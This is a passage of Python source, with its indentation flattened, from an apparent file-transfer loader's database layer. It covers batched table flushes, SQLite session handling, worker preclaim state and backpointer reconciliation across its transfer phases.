# is not set because when we do crash recovery we may be checking for
# repeat work.
for tobj in self._upsert_tobj.values():
tobj.drop_barrier()
with db.timers.start('preclaim_more'):
db.toc_preclaim.preclaim_more(db, session, query)
def may_reap_children(self, tobj):
'''
Return whether it is okay to reap children of this item from the target_obj table.
This is written in such a way that tobj may be a TargetObj or DbEntTargetObj.
'''
return (self.phase == Phase.TRANSFER) and (tobj.ftype == Ftype.DIR) and (tobj.state == TargetObjState.DONE)
@staticmethod
def may_reap(tobj):
'''
Return whether it is okay to reap this item from the target_obj table.
This is written in such a way that tobj may be a TargetObj or DbEntTargetObj.
'''
return (tobj.state == TargetObjState.DONE) \
and (tobj.ftype != Ftype.DIR) \
and (tobj.nlink == 1) \
and (tobj.first_backpointer != FILEHANDLE_NULL_BYTES)
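    # Example (not part of the original source): a regular file in state DONE
    # with nlink == 1 and a non-null first_backpointer is deleted from the
    # target_obj table at flush time; directories and multi-link files are
    # kept so that later phases can still reconcile their backpointers.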
def move_current_toc_to_toc_flush_NL(self):
'''
Move the current toc batch to the flushing list
and start another one.
'''
toc = self.toc_buffering
self.toc_flush_list.append(toc)
count = toc.upsert_count_NL()
if count < toc.flush_dirty_count_nondir_max:
self.toc_flush_morenondir_list.append(toc)
if count < toc.flush_dirty_count_max:
self.toc_flush_moredir_list.append(toc)
self.toc_idx_prev += 1
self.toc_buffering = self.TocBatch(self.toc_idx_prev)
def toc_flush_list_pop_to_toc_flushing_NL(self):
'''
Pop the next item from toc_flush_list.
Return False iff toc_flush_list is empty.
'''
try:
toc = self.toc_flush_list.popleft()
except IndexError:
return False
try:
if self.toc_flush_morenondir_list[0] is toc:
self.toc_flush_morenondir_list.popleft()
except IndexError:
pass
try:
if self.toc_flush_moredir_list[0] is toc:
self.toc_flush_moredir_list.popleft()
except IndexError:
pass
self.toc_flushing = toc
return True
class BackgroundThreadStateToc(_BackgroundThreadState):
'State specific to the thread that does toc flushes'
# Start flushing if this much time has elapsed since the last flush started
_flush_interval_seconds = 300.0
@staticmethod
def time_wait_NL(db):
'''
Return the maximum number of seconds to spend waiting for work (relative)
'''
return db.toc_buffering.time_wait_NL()
def _run(self, db):
'wrapper around base class that tries to ensure flush waiters do not get stuck'
try:
super(ClfsLoadDB.BackgroundThreadStateToc, self)._run(db)
finally:
notify_all(db.toc_flush_cond)
def any_work_to_do_NL(self, db, setup_work=False):
'See base class'
# A subtlety: we leverage the calls to this operation to detect
# that the current batch needs to flush, and if so we move it to
# toc_flush_list. Before we compute the return value, see if the
# current batch is full enough to warrant flushing. If so, move
# it to the flush list and start filling the next batch. This
# prevents batches from becoming oversized and generating stalls
# while they flush.
# As a minor performance optimization, we do not check
# getexistingkeys here. Instead, we rely on the fact that if
# those are non-empty, must_flush is set.
buffering_len = len(db.toc_buffering)
if (buffering_len >= db.toc_buffering.flush_dirty_count_min) \
or (db.toc_buffering.must_flush and (db.toc_flushing is None) and (not db.toc_flush_list)) \
or ((not db.toc_flush_list) and buffering_len and db.toc_buffering.flush_for_time_or_idle(db)):
db.move_current_toc_to_toc_flush_NL()
else:
buffering_upsert_count = db.toc_buffering.upsert_count_NL()
if buffering_upsert_count:
if db.toc_flush_next_upsert:
db.move_current_toc_to_toc_flush_NL()
db.toc_flush_next_upsert = False
elif db.toc_flushing is None:
if (not db.toc_flush_list) and db.toc_preclaim.want_more():
db.move_current_toc_to_toc_flush_NL()
elif db.toc_buffering.flush_for_time():
db.move_current_toc_to_toc_flush_NL()
# Now return whether we should start another flush
ret = False
if db.toc_flush_list and (db.toc_flushing is None):
if setup_work:
ret = db.toc_flush_list_pop_to_toc_flushing_NL()
else:
ret = True
return ret
def _do_work(self, db):
'See base class'
flush_count = 0
session = None
try:
session = db.dbtobj.session_get()
while True:
flush_count += 1
try:
what = 'flush'
db.check_usable()
db.toc_flushing.flush(db, session)
what = 'postflush'
db.toc_flushing.postflush(db, session)
except (KeyboardInterrupt, SystemExit):
db.should_run = False
raise
except:
err = "%s %s cannot %s: %s" % (self, db, what, exc_info_err())
db.logger.error("%s\n%s\n%s", err, exc_stack(), err)
db.terminal_error = "%s %s cannot %s" % (self, db, what)
break
if (flush_count >= 5) \
or (not db.all_phase_threads_are_idle) \
or db.toc_preclaim \
or db.toc_flushing.must_flush:
break
# If we got here, then flushing this toc did not enable
# anything and all worker threads are idle. Flush
# another toc under the same transaction (session)
# to reduce session overhead.
with db.toc_lock:
did_pop = db.toc_flush_list_pop_to_toc_flushing_NL()
if not did_pop:
break
try:
what = 'commit'
db.check_usable()
session.commit()
except (KeyboardInterrupt, SystemExit):
db.should_run = False
raise
except:
err = "%s commit %s: %s" % (self, db, exc_info_err())
exc_log(db.logger, logging.ERROR, err)
db.terminal_error = "%s %s cannot %s" % (self, db, what)
finally:
db.dbtobj.session_release(session)
def _done_work_NL(self, db):
'See base class'
if not db.terminal_error:
db.toc_preclaim.pend_committed()
db.toc_idx_flushed_last = db.toc_flushing.toc_idx
db.toc_flushing = None
if db.dbc_any_work_queued_NL() or (not db.toc_idx_flushed_and_work_remaining_last):
db.toc_idx_flushed_and_work_remaining_last = db.toc_idx_flushed_last
db.toc_flush_cond.notify_all()
count = db.toc_preclaim.ready_count()
if count:
db.phase_work_poke(count)
elif not db.dbc_any_work_queued_NL():
# We may be done - wake everyone up to check.
db.phase_work_poke(0)
else:
db.check_phase_idle_NL()
def check_phase_idle_NL(self):
'''
If worker (phase) threads are idle, and the only work pending
is in the current unflushed batch, start flushing it.
'''
if self._any_phase_threads_are_idle and (not self.toc_flush_list):
if self.toc_buffering:
if self.toc_thread_state.any_work_to_do_NL(self):
self.toc_run_cond.notify_all()
elif not self.toc_flushing:
if self._all_phase_threads_are_idle:
# We may be done - wake everyone up to check.
self.phase_work_poke(0)
def dbc_check_for_more_work(self):
'''
Determine if there is more work to do.
'''
return self._dbc_do_simple(self.dbc_check_for_more_work_NL)
def dbc_any_work_queued_NL(self, include_buffering=True):
'''
Return whether any known work is queued. This does not say whether
or not there is known work in the DB that is not yet read into
toc_preclaim.
'''
if self.toc_preclaim or (self.toc_flushing is not None) or self.toc_flush_list:
return True
if include_buffering and self.toc_buffering:
return True
return False
def dbc_check_for_more_work_NL(self, *args): # pylint: disable=unused-argument
'''
Determine if there is more work to do for this phase.
A false return tells the pool of worker threads that
there is nothing more to do for this phase.
'''
if self.dbc_any_work_queued_NL(include_buffering=False):
return True
if self.toc_buffering or (self.toc_idx_flushed_and_work_remaining_last == self.toc_idx_flushed_last) or (not self.toc_idx_flushed_and_work_remaining_last):
# The last time a flush finished, there was more to do. Force
# another flush to trigger preclaim. If that finishes without
# preclaiming anything, then self.toc_idx_flushed_last advances
# past self.toc_idx_flushed_and_work_remaining_last, and a subsequent
# call to this operation returns false.
# If self.toc_idx_flushed_and_work_remaining_last is zero, then we have not
# yet flushed at all since starting this phase, so kick a flush.
self.move_current_toc_to_toc_flush_NL()
self.toc_run_cond.notify_all()
return True
assert self.toc_idx_flushed_and_work_remaining_last < self.toc_idx_flushed_last
return False
def dbc_claim(self, wts):
'''
Claim and return one item
'''
return self._dbc_do_simple(self._dbc_claim_NL, wts=wts)
def _dbc_claim_NL(self, sa):
'''
Claim and return one item
Caller holds lock
'''
ret = self.toc_preclaim.get_one()
if (not ret) and sa.wts:
sa.wts.stats.stat_inc('dbc_claim_miss')
self.check_phase_idle_NL()
return ret
def dbc_flush(self):
'''
Flush the current batch (and all preceding batches)
'''
self._dbc_do_simple(None, wait_for_flush=True)
def dbc_get_existing(self, wts, existing):
'Return a list of entries matching existing (ExistingTargetObjKey)'
getexisting = {existing : None}
self._dbc_do_simple(None, getexisting=getexisting, wts=wts)
self.check_usable()
return getexisting[existing]
def dbc_existing_key_barrier_begin(self, existing):
'''
The caller is about to perform an operation that must know whether or
not ExistingTargetObjKey existing is matched. If another such
operation is in-flight, block until it completes. Return a new
ExistingTargetObjKeyBarrier object.
'''
with self.upsert_existing_pending_cond:
if existing in self.upsert_existing_pending_set:
self.stats.stat_inc('get_existing_stall')
with self.timers.start('get_existing_stall'):
while existing in self.upsert_existing_pending_set:
if (not self.toc_flushing) and (not self.toc_flush_list):
self.toc_buffering.must_flush = True
self.toc_run_cond.notify_all()
self.upsert_existing_pending_cond.wait(timeout=5.0)
self.check_usable()
self.upsert_existing_pending_set.add(existing)
return ExistingTargetObjKeyBarrier(existing, self)
def dbc_existing_key_barrier_end(self, existing):
'''
This is used by ExistingTargetObjKeyBarrier to drop
the barrier. Do not call this directly; always call
via the drop method of ExistingTargetObjKeyBarrier
or by destroying ExistingTargetObjKeyBarrier.
'''
with self.upsert_existing_pending_cond:
try:
self.upsert_existing_pending_set.remove(existing)
self.upsert_existing_pending_cond.notify_all()
except KeyError:
self.raise_terminal("dbc_exiting_key_barrier_end with no corresponding _begin for %s" % str(existing))
def dbc_upsert_single(self, wts, tobj):
'''
Insert or overwrite a targetobj
'''
# do not yield here - we yield in other dbc ops to keep
# this one flowing
self._dbc_do_simple(self._dbc_upsert_single_NL, tobj, wts=wts)
def dbc_upsert_multi(self, wts, tobjs):
'''
Insert or overwrite multiple targetobjs
'''
# do not yield here - we yield in other dbc ops to keep
# this one flowing
if tobjs:
self._dbc_do_simple(self._dbc_upsert_multi_NL, tobjs, wts=wts)
def _dbc_upsert_multi_NL(self, sa, tobjs):
for tobj in tobjs:
self._dbc_upsert_single_NL(sa, tobj)
def _dbc_upsert_single_NL(self, sa, tobj):
'''
Insert or overwrite a targetobj; called from within _dbc_do_simple()
'''
if self.toc_preclaim.want_more() and self.toc_flush_list:
# Preclaim wants more. Find the earliest batch
# in the flush queue where we can add this upsert.
wts = sa.wts
if wts:
wts.stats.stat_inc('dbc_upsert_toc_check')
if tobj.ftype == Ftype.DIR:
deque = self.toc_flush_moredir_list
maxlen = self.TocBatch.flush_dirty_count_max
else:
deque = self.toc_flush_morenondir_list
maxlen = self.TocBatch.flush_dirty_count_nondir_max
if deque:
if wts:
wts.stats.stat_inc('dbc_upsert_toc_found')
toc = deque[0]
toc.upsert_ins_NL(tobj)
if len(toc) >= maxlen:
deque.popleft()
return
sa.toc.upsert_ins_NL(tobj)
def dbc_update_state(self, wts, tobj, new_state, child_dir_count=None, new_size=None, wait_for_flush=False, surrender_tobj=False):
'''
Update state of object to new_state.
In some cases, we might use this to handle a change to size without changing the state.
If new_state is terminal, and surrender_tobj
is set, then we may assume ownership of the tobj and further assume that the
only changes to tobj that may come after this are via dbc_add_backpointer().
'''
if new_state not in self.phase_terminal_states:
surrender_tobj = False
assert (child_dir_count is None) or ((tobj.ftype == Ftype.DIR) and (new_state in (TargetObjState.WRITING, tobj.state)))
assert (new_size is None) or (tobj.ftype != Ftype.DIR)
usd = _UpdateStateDesc(new_state, child_dir_count, new_size)
if surrender_tobj:
usd.tobj = tobj
self._dbc_do_simple(self._dbc_update_state_NL, tobj, usd, wait_for_flush=wait_for_flush, wts=wts)
@staticmethod
def _dbc_update_state_NL(sa, tobj, usd):
'Update state of object to new_state'
sa.toc.update_state_ins_NL(tobj, usd)
def dbc_add_backpointer(self, wts, tobj, backpointer):
'Add a single backpointer to a target obj'
self._dbc_do_simple(self._dbc_add_backpointer_NL, tobj, backpointer, wts=wts, wait_for_flush=True)
@staticmethod
def _dbc_add_backpointer_NL(sa, tobj, backpointer):
'Add a single backpointer to a target obj'
# Important: do not cache tobj here. The add_backpointer case
# happens when a caller discovers a matching entry via dbc_get_matching_link_targets().
# Only the filehandle and backpointer matter.
sa.toc.add_backpointer_ins_NL(tobj, backpointer)
def _dbc_do_simple(self, proc, *args, wait_for_flush=False, getexisting=None, wts=None):
'''
Return proc(SimpleArgs, *args), executing that under the lock
associated with toc_flush_cond.
If getexisting is set, it is a dict where keys are ExistingTargetObjKey
and values are lists of matching TargetObj. Force a flush regardless
of the value of wait_for_flush, and in the same transaction
retrieve these matching TargetObjs.
'''
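# Illustrative caller pattern (see dbc_get_existing() above): pass
# getexisting={key: None}; after the forced flush completes, this dict is
# filled in with the list of TargetObj entries matching each key.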
ret = None
getexisting = getexisting or dict()
self.toc_flush_cond.acquire()
try:
self.check_usable()
toc = self.toc_buffering
wait_for_flush_this_time = toc.toc_idx if wait_for_flush or getexisting else 0
if getexisting:
for k in getexisting.keys():
toc.getexistingkeys.add(k)
if proc:
class SimpleArgs():
def __init__(self, toc, wts):
self.toc = toc
self.wts = wts
sa = SimpleArgs(toc, wts)
ret = proc(sa, *args)
else:
ret = None
if wait_for_flush_this_time:
toc.must_flush = True
self.toc_run_cond.notify_all()
while self.toc_idx_flushed_last < wait_for_flush_this_time:
self.check_usable()
self.toc_flush_cond.wait(timeout=30.0)
self.check_usable()
for k in getexisting.keys():
tmp = toc.getexistingresults.get(k, None)
for toc in self.toc_flush_list:
tmp.extend(toc.get_existing_NL(self, k))
tmp.extend(self.toc_buffering.get_existing_NL(self, k))
getexisting[k] = tmp
# If this activity generated work, be sure to kick the thread
if self.toc_thread_state.any_work_to_do_NL(self):
self.toc_run_cond.notify_all()
return ret
except DbInconsistencyError as e:
self.is_consistent = False
err = "%s is inconsistent" % str(self)
self.raise_terminal(err, fromex=e)
finally:
self.toc_flush_cond.release()
def db_tobj_get(self, filehandle):
'''
Return the entry for filehandle, or None if it does not exist.
Additional backpointers are always included.
Do not use while dbc is active.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
dbe = query.get(filehandle.bytes)
if dbe is None:
return None
tobj = TargetObj.from_dbe(dbe)
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
return tobj
finally:
self.dbtobj.session_release(session)
def db_tobj_set_state(self, filehandle, new_state):
'''
Update the state of one target object.
Do not use while dbc is active.
Returns the new tobj or None if not found.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
dbe = query.get(filehandle.bytes)
if dbe:
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
dbe.state = new_state
tobj = TargetObj.from_dbe(dbe)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
session.commit()
return tobj
finally:
self.dbtobj.session_release(session)
return None
DB_BACKPOINTER_CHECK_STATES = (TargetObjState.INODE_CLEANUP_PENDING,
TargetObjState.INODE_CLEANUP_CLEANING,
TargetObjState.ERROR,
TargetObjState.DONE,
)
def db_backpointer_check(self, rootfh):
'''
This is invoked after the reconcile phase. It finds non-root
entries with no backpointers and updates them to ERROR.
'''
logger = self.logger
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.first_backpointer == FILEHANDLE_NULL_BYTES)
for dbe in query:
if (dbe.filehandle == rootfh.bytes) or (dbe.state == TargetObjState.ERROR):
continue
if dbe.state not in self.DB_BACKPOINTER_CHECK_STATES:
logger.error("post_reconcile db_backpointer_check found %s (%s) with unexpected state %s",
dbe.filehandle.hex(), dbe.source_path_str, dbe.state)
raise SystemExit(1)
# Warn but do not treat as an error. This can happen
# if the source is modified during the transfer (including
# while the transfer is stopped and restarted).
logger.warning("post_reconcile db_backpointer_check found %s (%s) orphaned",
dbe.filehandle.hex(), dbe.source_path_str)
dbe.state = TargetObjState.ERROR
session.commit()
finally:
self.dbtobj.session_release(session)
def db_tobj_list_in_state(self, state, ic_restored_in_progress=False):
'''
Return a list of TargetObj in the DB table with the given state.
This is a direct DB query; it does not make use of any cached lists.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret = [TargetObj.from_dbe(dbe, ic_restored_in_progress=ic_restored_in_progress) for dbe in query]
if state == TargetObjState.INODE_WRITING:
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for tobj in ret:
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
return ret
finally:
self.dbtobj.session_release(session)
def db_tobj_iterate_in_state(self, state, op, op_args=None, op_kwargs=None):
'''
For each TargetObj with the given state, invoke op(tobj, *op_args, **op_kwargs).
op_args and op_kwargs may be None meaning empty.
If op raises an exception, it is logged and re-raised and iteration aborts.
If op returns True, the database is updated with the current contents of tobj.
'''
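# Illustrative op callback (hypothetical helper, shown only to spell out the contract):
#   def clear_size(tobj):
#       tobj.size = 0
#       return True   # True -> this tobj is included in the bulk DB update
#   db.db_tobj_iterate_in_state(TargetObjState.ERROR, clear_size)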
op_args = op_args if op_args else tuple()
op_kwargs = op_kwargs if op_kwargs else dict()
update_dbe_list = list()
session = None
try:
session = self.dbtobj.session_get()
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
for dbe in query:
tobj = TargetObj.from_dbe(dbe)
if op(tobj, *op_args, **op_kwargs):
update_dbe_list.append(tobj.to_db_dict())
if update_dbe_list:
session.bulk_update_mappings(DbEntTargetObj, update_dbe_list)
session.commit()
except:
exc_log(self.logger, logging.WARNING, 'db_tobj_iterate_in_state')
raise
finally:
self.dbtobj.session_release(session)
@staticmethod
def db_force_reconcile(dbe, force_reconcile_fhs):
'''
This is invoked from db_clear_backpointers() to indicate
that an object has lost a backpointer. Here we update
the object state to ensure that it is reconciled.
This can only happen if we are in the TRANSFER phase.
Caller has a session active and will commit it.
'''
if dbe.filehandle not in force_reconcile_fhs:
dbe.reconcile_vers = dbe.reconcile_vers + 1
if dbe.nlink == 1:
# Be sure this is not reaped and is instead reconciled
dbe.nlink = 2
if dbe.state == TargetObjState.DONE:
dbe.state = TargetObjState.INODE_PENDING
elif dbe.state == TargetObjState.ERROR:
# Push back pre_error_state so that if we retry, we will reconcile.
if dbe.pre_error_state > TargetObjState.INODE_WRITING:
dbe.pre_error_state = TargetObjState.INODE_PENDING
force_reconcile_fhs.add(dbe.filehandle)
def db_clear_backpointers(self, session, filehandle, force_reconcile_fhs):
'''
Remove all backpointers to the given filehandle. This includes
additional_backpointers as well as first_backpointer.
'''
# Delete all DbEntAdditionalBackpointerMapEnt that point to filehandle
query_abp = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
query_fbp = self.query_DbEntTargetObj.with_session(session)
query_result = list(query_abp.filter(DbEntAdditionalBackpointerMapEnt.filehandle_to == filehandle.bytes))
for bpe in query_result:
if bpe.filehandle_from not in force_reconcile_fhs:
dbe = query_fbp.get(bpe.filehandle_from)
if dbe:
self.db_force_reconcile(dbe, force_reconcile_fhs)
session.delete(bpe)
# commit now so the query below does not see the things we deleted
session.commit()
# clear first_backpointer for all entries that match
query = query_fbp.filter(DbEntTargetObj.first_backpointer == filehandle.bytes)
for dbe in query:
dbe.first_backpointer = FILEHANDLE_NULL_BYTES
self.db_force_reconcile(dbe, force_reconcile_fhs)
# Pull up additional backpointers
for bpe in query_abp.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == dbe.filehandle).limit(1):
dbe.first_backpointer = bpe.filehandle_to
if bpe.count > 1:
bpe.count = bpe.count - 1
else:
session.delete(bpe)
# commit now so subsequent calls see the pullup results
session.commit()
def _dump_meta(self, session):
'Dump metastore contents from the given session for debugging'
query = self.query_DbEntMeta.with_session(session).order_by(DbEntMeta.m_key)
md_dict = {md.m_key : DbEntMetaKey.value_from_dbe(md.m_key, md.m_value) for md in query}
mt = [(k, md_dict[k]) for k in sorted(md_dict.keys())]
print(pprint.pformat(mt))
def dump(self):
'Dump DB contents for debugging'
session = self.dbmeta.session_get()
try:
self._dump_meta(session)
finally:
self.dbmeta.session_release(session)
session = self.dbtobj.session_get()
try:
self._dump_meta(session)
query = self.query_DbEntTargetObj.with_session(session)
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for dbe in query.order_by(DbEntTargetObj.filehandle):
tobj = TargetObj.from_dbe(dbe)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
print('\n' + tobj.pformat())
qs = ('PRAGMA cache_size;',
'PRAGMA cache_spill;',
'PRAGMA journal_mode;',
'PRAGMA max_page_count;',
'PRAGMA mmap_size;',
'PRAGMA page_size;',
)
conn = query._connection_from_session(close_with_result=True) # pylint: disable=protected-access
for q in qs:
res = conn.execute(q)
while True:
one = res.fetchone()
if not one:
break
d = {k : one[k] for k in one.keys()}
print("%s %s" % (q, pprint.pformat(d)))
finally:
self.dbtobj.session_release(session)
def wake_all(self):
'''
Wake all background threads
'''
notify_all(self.fhseq_run_cond)
notify_all(self.fhseq_get_cond)
notify_all(self.toc_run_cond)
notify_all(self.toc_flush_cond)
class _UpdateStateDesc():
'Describe one dbc_update_state() request'
def __init__(self, state, child_dir_count, size):
self.state = state
self.child_dir_count = child_dir_count
self.size = size
self.tobj = None
def __bool__(self):
'True iff this _UpdateStateDesc modifies anything'
return (self.state is not None) or (self.child_dir_count is not None) or (self.size is not None)
def add(self, other):
'Overwrite settings in self with non-None settings from other'
if other.state is not None:
self.state = other.state
if other.child_dir_count is not None:
self.child_dir_count = other.child_dir_count
if other.size is not None:
self.size = other.size
class _DBSessionWrapper():
'''
Wrap session management for one database.
'''
def __init__(self, logger, filepath):
self._logger = logger
self._filepath = os.path.abspath(filepath)
self._uri = 'sqlite:///' + self._filepath
if not os.path.exists(self._filepath):
# We must set the page_size here before sqlalchemy
# slips in and starts issuing commands.
logger.debug("precreate %s", self._filepath)
conn = None
cursor = None
try:
conn = sqlite3.connect(self._filepath)
cursor = conn.cursor()
cursor.execute("PRAGMA page_size=%d;" % _PAGE_SIZE)
# Create a table so we do something with the page_size.
# Otherwise, it's gone when a new connection comes along to
# create a real table.
cursor.execute("CREATE TABLE bogus(key INTEGER, value INTEGER, PRIMARY KEY (key));")
finally:
if cursor:
cursor.close()
cursor = None
if conn:
conn.commit()
conn.close()
del conn
self._engine = sqlalchemy.create_engine(self._uri)
self._count = 0
def __str__(self):
return "%s(%s)" % (self.__class__.__name__, self._filepath)
def __repr__(self):
return "<%s,%s,%s>" % (self.__class__.__name__, hex(id(self)), self._filepath)
def __del__(self):
if hasattr(self, '_logger') and hasattr(self, '_count'):
if self._count:
self._logger.warning("%s del with outstanding count %d", self, self._count)
def create_all(self):
'''
Create all tables for this session. This implies that we are starting a new run.
'''
self._logger.debug("Create new DB %s", self._filepath)
DbEntBase.metadata.create_all(self._engine)
def session_get(self):
'''
Generate and return a new session with the transaction started.
The caller is responsible for using session_release() to
destroy the session. This performs no sanity checks
on the overall DB state - callers such as db_count_all()
rely on that.
'''
ret = Session(bind=self._engine, autoflush=False, _enable_transaction_accounting=False)
self._count += 1
return ret
def session_release(self, session):
'Destroy a session previously obtained from session_get()'
if session is not None:
self._count -= 1
session.rollback()
class PreclaimState():
'''
Encapsulate state about preclaimed target objects. A target object
is preclaimed if it is marked claimed in the table but no worker
thread is currently processing it. We try to keep a minimum level
of preclaimed objects so that worker threads do not stall waiting
to mark objects claimed. No locking in this obj; the caller (dbc_*
methods of ClfsLoadDB) is responsible for that.
'''
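# Rough lifecycle, as driven by the dbc_* methods above: preclaim_offer() and
# preclaim_more() run inside a flush and stash candidates on the pend_* lists,
# pend_committed() publishes them once the flush commits, and worker threads
# drain them via get_one() (bound per-phase in the phase setter below).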
dirs_generating_min = 2
def __init__(self, logger):
self._logger = logger
# Phase.TRANSFER
self._writing_data = list()
self._writing_nodata = list()
self._generating_dirs = list()
self._pend_writing_data = list()
self._pend_writing_nodata = list()
self._pend_generating_dirs = list()
self._tobj_index = dict()
self._tobj_active = dict()
# Phase.RECONCILE
self._writing_inodes = list()
self._pend_writing_inodes = list()
# Phase.CLEANUP
self._cleaning_inodes = list()
self._pend_cleaning_inodes = list()
self._phase = None
self._lowat_count = 0 # low-water count; preclaim more if we have fewer than this many
self._hiwat_count = 0 # when we preclaim, aim for this many
self._preclaim_max_at_once = 1 # max query size for preclaim
self.accepted_all_offers = True # fastpath out of preclaim_more()
self.get_one = None # proc, set in phase.setter
def __len__(self):
if self._phase == Phase.TRANSFER:
return len(self._tobj_index) \
+ len(self._pend_writing_data) \
+ len(self._pend_writing_nodata) \
+ len(self._pend_generating_dirs)
if self._phase == Phase.RECONCILE:
return len(self._writing_inodes) + len(self._pend_writing_inodes)
if self._phase == Phase.CLEANUP:
return len(self._cleaning_inodes) + len(self._pend_cleaning_inodes)
return 0
def __bool__(self):
'''
Return whether there is anything preclaimed. Must include pend_*
so that flushing knows whether it has pending preclaims.
'''
if self._phase == Phase.TRANSFER:
if self._tobj_index \
or self._pend_writing_data \
or self._pend_writing_nodata \
or self._pend_generating_dirs:
return True
return False
if self._phase == Phase.RECONCILE:
if self._writing_inodes or self._pend_writing_inodes:
return True
return False
if self._phase == Phase.CLEANUP:
if self._cleaning_inodes or self._pend_cleaning_inodes:
return True
return False
return False
@property
def phase(self):
return self._phase
_TRANSFER_LOWAT = 300
_TRANSFER_HIWAT = 10000
_TRANSFER_PRECLAIM_MAX_AT_ONCE = 1000
_RECONCILE_LOWAT = 600
_RECONCILE_HIWAT = 10000
_RECONCILE_PRECLAIM_MAX_AT_ONCE = 150
_CLEANUP_LOWAT = 5000
_CLEANUP_HIWAT = 10000
_CLEANUP_PRECLAIM_MAX_AT_ONCE = 150
@phase.setter
def phase(self, value):
self._phase = value
if self._phase == Phase.TRANSFER:
self._lowat_count = self._TRANSFER_LOWAT
self._hiwat_count = self._TRANSFER_HIWAT
self._preclaim_max_at_once = self._TRANSFER_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_transfer
elif self._phase == Phase.RECONCILE:
self._lowat_count = self._RECONCILE_LOWAT
self._hiwat_count = self._RECONCILE_HIWAT
self._preclaim_max_at_once = self._RECONCILE_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_reconcile
elif self._phase == Phase.CLEANUP:
self._lowat_count = self._CLEANUP_LOWAT
self._hiwat_count = self._CLEANUP_HIWAT
self._preclaim_max_at_once = self._CLEANUP_PRECLAIM_MAX_AT_ONCE
self.get_one = self._get_one_cleanup
else:
self._lowat_count = 0
self._hiwat_count = 0
self._preclaim_max_at_once = 150
def ready_count(self):
'Return the number of items ready for claim'
return len(self._tobj_index) \
+ len(self._writing_inodes) \
+ len(self._cleaning_inodes)
def want_more(self):
'Return True if we should fetch more'
# Skip considering the extra generating dir to avoid repeatedly
# forcing flushes that do not find it. Just consider low-water.
return len(self) < self._lowat_count
def load_startup(self, db, reset_dirs=True):
'''
Load all claimed target objects. This is done irrespective
of target counts. It is called outside any extant transaction.
If reset_dirs is set, clear backpointers from existing dirs.
'''
# Only Ftype.DIR may be GENERATING
# Clear backpointers before loading.
self._generating_dirs = db.db_tobj_list_in_state(TargetObjState.GENERATING)
if reset_dirs:
session = None
try:
session = db.dbtobj.session_get()
query_f = db.query_DbEntTargetObj.with_session(session)
force_reconcile_fhs = set()
for tobj in self._generating_dirs:
dbe = query_f.get(tobj.filehandle.bytes)
if dbe:
db.db_force_reconcile(dbe, force_reconcile_fhs)
db.db_clear_backpointers(session, tobj.filehandle, force_reconcile_fhs)
del force_reconcile_fhs
session.commit()
finally:
db.dbtobj.session_release(session)
# Reload generating_dirs - we may have changed backpointers above
self._generating_dirs = db.db_tobj_list_in_state(TargetObjState.GENERATING, ic_restored_in_progress=True)
self._generating_dirs.sort(key=lambda tobj: tobj.size)
self._tobj_index = {tobj.filehandle : tobj for tobj in self._generating_dirs}
# For selection purposes, treat DIR, REG, and LNK together -
# they are all variable-length types, and we would rather
# service larger ones first.
tobjs = db.db_tobj_list_in_state(TargetObjState.WRITING, ic_restored_in_progress=True)
for tobj in tobjs:
if tobj.ftype in DATA_FTYPES:
self._writing_data.append(tobj)
else:
self._writing_nodata.append(tobj)
self._tobj_index[tobj.filehandle] = tobj
self._writing_data.sort(key=lambda tobj: tobj.size)
self._writing_inodes = db.db_tobj_list_in_state(TargetObjState.INODE_WRITING, ic_restored_in_progress=True)
self._cleaning_inodes = db.db_tobj_list_in_state(TargetObjState.INODE_CLEANUP_CLEANING, ic_restored_in_progress=True)
def preclaim_offer(self, tobj):
'''
Offer a tobj to preclaim. This is done while flushing.
If interested, modify the tobj to reflect the preclaim
and append to the correct pend list. This works without
locks because the pend lists are not visible until
pend_committed().
BEWARE: This operates without copying the tobj.
Only upserting objects are offered, and that only
happens during Phase.TRANSFER.
'''
assert (self._phase == Phase.TRANSFER) or (self._phase == Phase.INIT)
if tobj.state == TargetObjState.PENDING:
have = len(self._tobj_index)
have += len(self._pend_writing_data) + len(self._pend_writing_nodata) + len(self._pend_generating_dirs)
if tobj.ftype == Ftype.DIR:
have_generating = len(self._generating_dirs) + len(self._pend_generating_dirs)
if (have_generating < self.dirs_generating_min) or (have < self._hiwat_count):
tobj.state = TargetObjState.GENERATING
self._pend_generating_dirs.append(tobj)
else:
self.accepted_all_offers = False
else:
if have < self._hiwat_count:
tobj.state = TargetObjState.WRITING
if tobj.ftype <= Ftype.LNK:
self._pend_writing_data.append(tobj)
else:
self._pend_writing_nodata.append(tobj)
else:
self.accepted_all_offers = False
def preclaim_add_pend_writing_data(self, tobj):
'''
Add the given tobj to _pend_writing_data
'''
self._pend_writing_data.append(tobj)
def preclaim_update_for_add_backpointer(self, dbe):
'''
dbe is updated within a flush. If we have it in a writing or
generating list, update it
'''
filehandle = Filehandle(dbe.filehandle)
try:
tobj = self._tobj_index[filehandle]
except KeyError:
try:
tobj = self._tobj_active[filehandle]
except KeyError:
return
tobj.pend_first_backpointer = Filehandle(dbe.first_backpointer)
tobj.pend_nlink = dbe.nlink
return
tobj.first_backpointer = Filehandle(dbe.first_backpointer)
tobj.nlink = dbe.nlink
def preclaim_more(self, db, session, query):
if self.accepted_all_offers:
return
db.check_usable()
if self._phase == Phase.TRANSFER:
self._preclaim_more_transfer(query)
elif self._phase == Phase.RECONCILE:
self._preclaim_more_reconcile(db, session, query)
elif self._phase == Phase.CLEANUP:
self._preclaim_more_cleanup(query)
